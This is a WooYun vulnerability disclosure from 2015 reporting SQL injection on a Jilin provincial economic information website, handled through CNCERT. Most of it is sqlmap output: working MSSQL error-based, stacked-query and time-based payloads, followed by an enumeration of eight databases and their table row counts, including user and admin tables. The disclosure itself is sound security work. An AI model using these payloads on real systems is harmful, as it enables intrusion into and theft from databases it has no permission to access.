当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147308

漏洞标题:吉林省经济信息网存在SQL注射。8库众多表

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-10-17 09:03

修复时间:2015-12-05 15:06

公开时间:2015-12-05 15:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-17: 细节已通知厂商并且等待厂商处理中
2015-10-21: 厂商已经确认,细节仅向厂商公开
2015-10-31: 细节向核心白帽子及相关领域专家公开
2015-11-10: 细节向普通白帽子公开
2015-11-20: 细节向实习白帽子公开
2015-12-05: 细节向公众公开

简要描述:

吉林省经济信息网存在SQL注射。8库众多表

详细说明:

http://**.**.**.**/hgjj/hgjjjjsj.jsp?lmid=8a8180251bfd9002011bfdd92ac10049

1.png


sqlmap identified the following injection points with a total of 62 HTTP(s) requests:
---
Parameter: lmid (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: lmid=8a8180251bfd9002011bfdd92ac10049' AND 8228=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (8228=8228) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113))) AND 'eous'='eous
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: lmid=8a8180251bfd9002011bfdd92ac10049'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: lmid=8a8180251bfd9002011bfdd92ac10049' WAITFOR DELAY '0:0:5'--
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: lmid (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: lmid=8a8180251bfd9002011bfdd92ac10049' AND 8228=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (8228=8228) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113))) AND 'eous'='eous
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: lmid=8a8180251bfd9002011bfdd92ac10049'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: lmid=8a8180251bfd9002011bfdd92ac10049' WAITFOR DELAY '0:0:5'--
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000
available databases [8]:
[*] fgw
[*] jljjw
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: lmid (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: lmid=8a8180251bfd9002011bfdd92ac10049' AND 8228=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (8228=8228) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113))) AND 'eous'='eous
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: lmid=8a8180251bfd9002011bfdd92ac10049'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: lmid=8a8180251bfd9002011bfdd92ac10049' WAITFOR DELAY '0:0:5'--
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000
available databases [8]:
[*] fgw
[*] jljjw
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
Database: tempdb
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.syssegments                      | 3       |
+--------------------------------------+---------+
Database: jljjw
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.article                          | 75607   |
| dbo.FRefer                           | 12830   |
| dbo.Visitor                          | 8766    |
| dbo.FMozilla                         | 5927    |
| dbo.FIptwo                           | 3506    |
| dbo.projectsb                        | 2657    |
| dbo.StatDay                          | 2425    |
| dbo.plate                            | 1194    |
| dbo.plate_view                       | 1194    |
| dbo.dzfw                             | 1144    |
| dbo.users                            | 1041    |
| dbo.filelista                        | 809     |
| dbo.FScreen                          | 533     |
| dbo.InfoList                         | 491     |
| dbo.FArea                            | 482     |
| dbo.sysuser_inputcolumn              | 194     |
| dbo.user_view                        | 194     |
| dbo.FIpone                           | 165     |
| dbo.sysconstraints                   | 161     |
| dbo.temps                            | 143     |
| dbo.FSystem                          | 113     |
| dbo.StatMonth                        | 96      |
| dbo.FAddress                         | 93      |
| dbo.FBrowser                         | 63      |
| dbo.SYS_TMP                          | 61      |
| dbo.TH_area                          | 52      |
| dbo.IpScope                          | 33      |
| dbo.b                                | 26      |
| dbo.infofeedback                     | 23      |
| dbo.sysuser_checkcolumn              | 17      |
| dbo.userrole_module                  | 17      |
| dbo.TH_hangye                        | 15      |
| dbo.projectsd                        | 14      |
| dbo.sysmodule                        | 14      |
| dbo.leavemessage                     | 13      |
| dbo.article_StatDay                  | 12      |
| dbo.article_StatWeek                 | 12      |
| dbo.D99_Tmp                          | 12      |
| dbo.StatYear                         | 12      |
| dbo.usersb                           | 10      |
| dbo.sysuser                          | 9       |
| dbo.sysuser_role                     | 9       |
| dbo.TH_diqu                          | 9       |
| dbo.sysuserrole                      | 8       |
| dbo.StatWeek                         | 7       |
| dbo.article_FBrowser                 | 6       |
| dbo.article_FIpone                   | 6       |
| dbo.article_FIptwo                   | 6       |
| dbo.article_FMozilla                 | 6       |
| dbo.article_FRefer                   | 6       |
| dbo.article_FScreen                  | 6       |
| dbo.article_FSystem                  | 6       |
| dbo.article_StatYear                 | 6       |
| dbo.article_temps                    | 6       |
| dbo.usersa                           | 6       |
| dbo.TH_fangshi                       | 5       |
| dbo.TH_tzfs                          | 5       |
| dbo.filelistb                        | 4       |
| dbo.TH_zblx                          | 4       |
| jlsa.infofeedbacktype                | 4       |
| dbo.article_InfoList                 | 3       |
| dbo.dealprocess                      | 3       |
| dbo.lead                             | 3       |
| dbo.syssegments                      | 3       |
| dbo.TH_biaoqian                      | 3       |
| dbo.TH_jch                           | 3       |
| jlsa.infofeedback                    | 3       |
| dbo.browser                          | 2       |
| dbo.lktype                           | 2       |
| dbo.plate_plate                      | 2       |
| dbo.projectsa                        | 2       |
| dbo.TH_tzfszd                        | 2       |
| dbo.TH_xzh                           | 2       |
| dbo.TH_zhuti                         | 2       |
| dbo.admin                            | 1       |
| dbo.config                           | 1       |
| dbo.D99_REG                          | 1       |
| dbo.FVisit                           | 1       |
| dbo.infofeedbacktype                 | 1       |
| dbo.leadsort                         | 1       |
| dbo.NotDownload                      | 1       |
| dbo.projectsc                        | 1       |
| dbo.webuser                          | 1       |
| dbo.xmpwd                            | 1       |
+--------------------------------------+---------+
Database: msdb
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.sysconstraints                   | 91      |
| dbo.syscategories                    | 19      |
| dbo.syssegments                      | 3       |
+--------------------------------------+---------+
Database: pubs
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.roysched                         | 86      |
| dbo.employee                         | 43      |
| dbo.sysconstraints                   | 34      |
| dbo.titleauthor                      | 25      |
| dbo.titleview                        | 25      |
| dbo.authors                          | 23      |
| dbo.sales                            | 21      |
| dbo.titles                           | 18      |
| dbo.jobs                             | 14      |
| dbo.pub_info                         | 8       |
| dbo.publishers                       | 8       |
| dbo.stores                           | 6       |
| dbo.discounts                        | 3       |
| dbo.syssegments                      | 3       |
+--------------------------------------+---------+
Database: master
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| INFORMATION_SCHEMA.PARAMETERS        | 2260    |
| dbo.spt_values                       | 730     |
| INFORMATION_SCHEMA.ROUTINES          | 651     |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 379     |
| INFORMATION_SCHEMA.COLUMNS           | 379     |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE | 295     |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE  | 62      |
| dbo.spt_datatype_info                | 36      |
| INFORMATION_SCHEMA.TABLES            | 34      |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES  | 33      |
| dbo.spt_server_info                  | 29      |
| dbo.spt_provider_types               | 25      |
| INFORMATION_SCHEMA.VIEWS             | 25      |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS   | 17      |
| dbo.spt_datatype_info_ext            | 10      |
| INFORMATION_SCHEMA.SCHEMATA          | 8       |
| dbo.syssegments                      | 3       |
| dbo.spt_monitor                      | 1       |
| dbo.sysconstraints                   | 1       |
+--------------------------------------+---------+
Database: Northwind
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.[Order Details Extended]         | 2155    |
| dbo.[Order Details]                  | 2155    |
| dbo.Invoices                         | 2155    |
| dbo.[Order Subtotals]                | 830     |
| dbo.[Orders Qry]                     | 830     |
| dbo.Orders                           | 830     |
| dbo.[Summary of Sales by Quarter]    | 809     |
| dbo.[Summary of Sales by Year]       | 809     |
| dbo.[Customer and Suppliers by City] | 120     |
| dbo.Customers                        | 91      |
| dbo.[Quarterly Orders]               | 86      |
| dbo.[Product Sales for 1997]         | 77      |
| dbo.[Sales by Category]              | 77      |
| dbo.Products                         | 77      |
| dbo.[Alphabetical list of products]  | 69      |
| dbo.[Current Product List]           | 69      |
| dbo.[Products by Category]           | 69      |
| dbo.[Sales Totals by Amount]         | 66      |
| dbo.Territories                      | 53      |
| dbo.EmployeeTerritories              | 49      |
| dbo.sysconstraints                   | 43      |
| dbo.Suppliers                        | 29      |
| dbo.[Products Above Average Price]   | 25      |
| dbo.Employees                        | 9       |
| dbo.[Category Sales for 1997]        | 8       |
| dbo.Categories                       | 8       |
| dbo.Region                           | 4       |
| dbo.syssegments                      | 3       |
+--------------------------------------+---------+

漏洞证明:

1

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-21 15:04

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给吉林分中心,由其后续协调网站管理单位处置。

最新状态:

暂无